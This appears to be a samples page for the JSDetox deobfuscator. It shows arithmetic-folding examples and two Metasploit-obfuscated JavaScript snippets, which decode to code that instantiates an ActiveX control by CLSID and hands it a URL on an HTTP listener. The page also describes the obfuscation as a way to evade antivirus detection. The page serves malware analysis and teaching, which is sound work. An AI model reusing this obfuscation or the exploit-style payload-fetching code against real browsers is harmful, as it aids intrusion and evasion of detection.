Jsdetox - Samples
Simple calculation
JSDetox analyzes the given code and tries to solve calculations through static analysis of the code:
(If you try the first two simple examples in JSDetox, be sure to check the option “Do not trace variable values” — otherwise the result will be an empty string: the variable x is never referenced, so the assignment has no effect and JSDetox removes it as dead code.)
Original Code
// Constant-folding sample: 10 * 3 + 100 - 70 / 10 == 30 + 100 - 7 == 123.
var x = 10 * 3 + 100 - 70 / 10;
Analysis Result
// JSDetox output for the sample above: the arithmetic is folded to its literal value.
var x = 123;
Call to known function with static result
Calls to known functions with predictable results get calculated.
Original Code
// Known-function sample: 2 << 4 is 32, (720094129).toString(32) is "length",
// so 'bp'["length"] is 2; -~-~2 is 4 (each ~n is -(n+1), each leading - negates);
// 4 * 8 + 2 == 34.
var x = -~-~'bp'[720094129.0.toString(2 << 4) + ""] * 8 + 2;
Analysis Result
// JSDetox output for the sample above: the toString/length/bitwise chain is evaluated to 34.
var x = 34;
Calculation
720094129.0.toString(2 << 4) => (720094129).toString(32) => "length"
'bp'[length] => 'bp'.length => 2
-~-~2 => 4
4 * 8 + 2 => 34
Metasploit Javascript Obfuscator
The main purpose of the Metasploit Javascript obfuscator is to hinder automatic analysis and evade AV detection, but it also makes manual analysis hard.
As the obfuscated code never passes a decoded script to eval(), there is no single function call to hook or break on in a debugger to recover the original Javascript — each string is decoded inline at the point where it is used.
This obfuscator makes the code hard to read by introducing complicated calculations of strings and renaming variables.
The code gets blown up without introducing external dependencies - so it is possible to reverse the process using static analysis.
The Metasploit blog contains more information on this obfuscator: Javascript Obfuscation in Metasploit
Original Code
// Metasploit-obfuscated sample. Every string is assembled at the point of use by an
// IIFE that concatenates fragments held in throwaway locals; the URL is built with
// String.fromCharCode from a mix of decimal, octal (leading 0) and hex (0x) codes.
// The legacy octal literals are a SyntaxError in strict mode / ES modules, so this
// must be run as a classic (sloppy-mode) script.
// NOTE(review): once decoded (see the analysis result below) this creates an <object>
// element, sets its classid to a fixed CLSID and points its url property at an HTTP
// listener. The CLSID identifies which ActiveX control is being instantiated --
// look it up rather than assuming; 127.0.0.1:8080 is presumably just the sample's
// local Metasploit listener, and the random-looking path is presumably per-session.
var GPSweCkB = document.createElement((function () { var XoNO="ject",apoc="ob"; return apoc+XoNO })());
GPSweCkB.setAttribute((function () { var pYmx="ssid",aTIE="a",tvPA="cl"; return tvPA+aTIE+pYmx })(), (function () { var MbWt="7566",UcNA="7",PUHo="c",yFIi="6-2F5",YXvW="sid",sYCs="E-4BAF",SZBF="9",yZMK="-AC28-CF26AA",BmVk="l",AbBB="58",iRQW="636",RQLv=":55"; return PUHo+BmVk+YXvW+RQLv+SZBF+iRQW+UcNA+yFIi+sYCs+yZMK+AbBB+MbWt })());
GPSweCkB.url = String.fromCharCode(104,0164,0164,112,0x3a,0x2f,0x2f,49,50,067,056,48,0x2e,48,46,49,072,0x38,
060,070,060,47,47,112,0165,0x46,0x62,0x4a,111,0146,0124,0143,0172,0x43,89,82,0x75,65,111,81,47);
Analysis Result
// JSDetox output for the sample above: the IIFE concatenations and the
// fromCharCode list are evaluated to plain string literals.
// NOTE(review): the decoded code instantiates an ActiveX control by CLSID and hands
// it a URL; which control that CLSID belongs to is not stated on this page and
// should be looked up before drawing conclusions about the payload.
var GPSweCkB = document.createElement("object");
GPSweCkB.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
GPSweCkB.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";
Metasploit Javascript Obfuscator (2)
This example shows that JSDetox performs a real evaluation of the code rather than merely matching known obfuscator patterns in the original code.
The original code from the previous example got fed again into the Metasploit obfuscator, making the code even bigger and more complicated. JSDetox is still able to calculate a condensed version of the original code.
Original Code
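// Second pass of the Metasploit obfuscator over the previous sample. The strings are
// now built from nested IIFEs and String.fromCharCode calls, and each character code on
// the last line is an arithmetic expression over numeric literals (decimal, octal with a
// leading 0, and hex) and the .length of throwaway string literals.
// The `*` operators on the last line had been stripped from this listing (apparently a
// markdown renderer treated them as emphasis markers), which left it unparsable; they
// are restored here. Each term evaluates to the same character code as the corresponding
// entry in the previous sample's fromCharCode list, so the decoded URL is unchanged.
// The legacy octal literals (e.g. 017, 030) are a SyntaxError in strict mode / ES modules,
// so this sample must be run as a classic (sloppy-mode) script.
var vqeJMM = document.createElement((function() {
var lmuxifox = (function () { var lFuh="ect",OtcD="j"; return OtcD+lFuh })(), qvrqA = String.fromCharCode(0x6f,98);
return qvrqA + lmuxifox;
})());
vqeJMM.setAttribute((function() {
var BrE = String.fromCharCode(115,0x73,105,100), oWnuEB = String.fromCharCode(97), bWVwPmvte = String.fromCharCode(0143,0154);
return bWVwPmvte + oWnuEB + BrE;
})(), (function() {
var VZKfxYVTesUuNa = String.fromCharCode(55,065,0x36,54), ANrWHzMVmQTEnX = (function () { var DsIA="7"; return DsIA })(), qnz = (function () { var uUmi="c"; return uUmi })(), plzNK = String.fromCharCode(0x36,055,062,70,0x35), brtluDTu = (function () { var eJeU="d",DJnq="si"; return DJnq+eJeU })(), AqMDLOwdJANJk = String.fromCharCode(0105,0x2d,52,0x42,0101,70), tjHrCLeCTfpRnX = (function () { var cVWQ="9"; return cVWQ })(), cwPWStJQJ = String.fromCharCode(0x2d,0x41,0103,062,0x38,0x2d,0103,0x46,062,066,65,0101), EfyYAZclv = String.fromCharCode(108), ZdLqwiaf = String.fromCharCode(53,070), IrOpZfY = (function () { var TtsU="6",kdod="63"; return kdod+TtsU })(), rOkewIqjVTn = (function () { var auio="5",JgSf=":5"; return JgSf+auio })();
return qnz + EfyYAZclv + brtluDTu + rOkewIqjVTn + tjHrCLeCTfpRnX + IrOpZfY + ANrWHzMVmQTEnX + plzNK + AqMDLOwdJANJk + cwPWStJQJ + ZdLqwiaf + VZKfxYVTesUuNa;
})());
vqeJMM.url = String.fromCharCode((1*0x40+40), ('Z'.length*0x6c+8), ('z'.length*0x63+17), (01*('cu'.length*0x2f+6)+12), ('e'.length*0x2c+14), (017*'HMF'.length+2), ('q'.length*('q'.length*0x12+13)+16), ('O'.length*(0x1*('uLq'.length*6+2)+11)+18), (01*0x1f+19), (02*('wuk'.length*06+5)+9), ('BW'.length*('WQD'.length*'NmmgJ'.length+2)+12), ('g'.length*0x26+10), ('S'.length*044+10), ('MK'.length*0x11+14), ('T'.length*0x2e+0), ('oe'.length*026+5), ('KNS'.length*(0x1*(7*'di'.length+0)+3)+7), ('b'.length*052+14), ('E'.length*(1*030+14)+10), ('c'.length*('ojyWqHE'.length*'ZDWrf'.length+3)+18), (01*0x2c+4), (01*42+5), (('hm'.length*0x12+11)*'m'.length+0), (05*(0x1*(0x2*012+1)+1)+2), (1*('Ws'.length*034+9)+52), ('hjc'.length*022+16), (01*78+20), ('zL'.length*37+0), ('s'.length*('C'.length*0x46+32)+9), ('nfzRwUXL'.length*(0x4*0x3+0)+6), (0x1*(02*21+7)+35), (01*0x5d+6), ('EU'.length*053+36), ((('nz'.length*'kaUOP'.length+1)*'F'.length+0)*0x6+1), ('k'.length*0115+12), ('a'.length*0x2c+38), (5*026+7), ('a'.length*0x26+27), (0x1*(1*(0x2*(3*0x8+6)+7)+21)+23), ('m'.length*(02*(0x1*0x10+12)+18)+7), (01*035+18));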
Analysis Result
// JSDetox output for the doubly-obfuscated sample above: identical to the result of the
// first pass, which is the point of the example -- the nested IIFEs, fromCharCode calls
// and length arithmetic are all evaluated rather than pattern-matched.
// NOTE(review): as before, the CLSID selects the ActiveX control being instantiated and
// the url property is what gets handed to it; identify the control before assuming intent.
var vqeJMM = document.createElement("object");
vqeJMM.setAttribute("classid", "clsid:55963676-2F5E-4BAF-AC28-CF26AA587566");
vqeJMM.url = "http://127.0.0.1:8080//puFbJofTczCYRuAoQ/";